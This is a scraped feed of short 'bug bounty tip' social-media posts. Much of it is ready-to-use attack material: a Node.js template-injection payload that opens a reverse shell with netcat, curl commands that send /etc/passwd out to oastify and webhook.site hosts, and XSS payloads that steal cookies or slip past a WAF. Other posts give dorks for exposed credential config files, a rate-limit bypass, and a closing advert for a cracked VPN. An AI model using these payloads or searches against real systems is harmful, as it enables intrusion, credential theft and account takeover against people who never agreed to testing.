๐จ If you discover a node.js template area, you should try triggerable node payload ๐; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}
so you can get RCE ๐
credit: ๐ฐ๐ฐผ๐ฐ๐ฑ
#bugbountytip #bugbountytip s
Add '.ftpconfig' to the wordlist, and maybe you will get juicy data. Enjoy!
#bugbountytip s #bugbountytip #cybersecurity #ethicalhacking
Files Containing Juicy Info inurl:'/.vscode/sftp.json'
#bugbounty #bugbounty tips #bugbounty tip #cybersecurity #ethicalhacking
An upload area, command area, input area or anywhere can sometimes give incredible results;
curl http:// ***. oastify . com -d 'data=$(cat /etc/passwd)'
or
curl https:// webhook . site/*** -d 'data=$(cat /etc/passwd)'
)
credit: ๐ฐ๐ฐผ๐ฐ๐ฑ
#BugBounty #bugbountytip
Found an Email Verification Bypass.
Tip: There is IP-based rate limiting so I used IP-Rotator Burp Extension and Bypassed the Rate Limting.
#BugBounty #bugbountytip #bugbountytip s #togetherwehitharder
Scan all possible TLD's for a given domain name
github.com/rix4uni/tldscan
#bugbountytip s #bugbountytip
๐ฅHackerone got hacked! How can I steal your POC? ๐ฅท๐ป
โข Weakness - Sensitive Information Disclosure
โข Bounty - $15,000 ๐ธ
โข CC - Hasyim
Critical bugs directly upstream (Hackerone) as a bug bounty platform.
credit: Abhishek Meena - {๐ฅ}
#bugbountytip
kresec.medium.com/hackerone-got-โฆ
Yay, I was awarded a $2,000 bounty on HackerOne! hackerone.com/divyansh2401 #TogetherWeHitHarder #bugbounty #bugbounty tips #bugbounty tip
1. Bypassed email verification with IP-Rotator Extension.
2. Created an account with [email protected].
3. Auto Joined their organization.
There may be services where geoserver vulnerabilities are still not updated, so you can search /geoserver/ows with gau or wayback and try your luck.
~ waybackurl domain[.]com | grep '/geoserver/ows/'
github.com/win3zz/CVE-202โฆ
#bugbounty tip #bugbounty
How I Exploited an Auth0 Misconfiguration to Bypass Login Restrictions
amjadali110.medium.com/how-i-exploiteโฆ
#bugbounty #bugbounty tips #bugbounty tip
#bugbountytip #BugBounty
A list of companies that accept responsible disclosure
bug-bounties.as93.net
(Filter+Cloudflare bypassed) Stored XSS leads account takeover
Payload: xyz';'/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
Tips: Always play with reflecting value's tags.
#bugbounty tip #bugbounty
Assist Cred. KNOXSS
API Hacking Tips
check for these endpoints
/redoc
/openapi.json
/swagger.json
/docs
if u found openapi.json or swagger.json just import the file in Postman and configure the Postman proxy to the same as burp
#bugbounty tip #bugbounty #bugbounty tip s
๐คMany people have often asked me how to search for 'ivanti', for shodan you can search as title:'Ivanti Connect' hostname:'target.*'
credit: ๐ฐ๐ฐผ๐ฐ๐ฑ
#bugbounty tip #bugbounty
Sometimes when arjun does not work properly for parameter guessing, I use ffuf instead:
ffuf -u 'https://target\.com/payment.php?FUZZ=regular' -w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
#bugbounty #bugbounty tip #bugbounty tips
Check out the latest post on Invent Your Shit on exploiting Authentication Bypasses vulnerability in Webgoat Labs.
Here: inventyourshit.com/webgoat-authenโฆ
#ctf #Webgoat #webhacking #bugbountytip #bugbouny #Hacking #AuthenticationBypass
XSS Bypass - working on ASPNET Generic Microsoft WAF (detected by AFW00F)
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//
Tag the original creator below so I can give them some hacker clout.
#bugbounty #bugbounty tip
#XSS could be be triggers in #url itself, no need to parameter injectionโ๐ป
Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E
2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
#bugbounty #bugbounty tip #bugbounty tips
#MrHex88
Betternet VPN Premium v8.8.1.1322 Full Activated โ Discount 100% OFF dr-farfar.com/betternet-vpn-โฆ #infosec #bugcrowd #bugbountytip s #bugbountytip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #BugHunter #Javascript via Dr.FarFar ( VMH0T3P )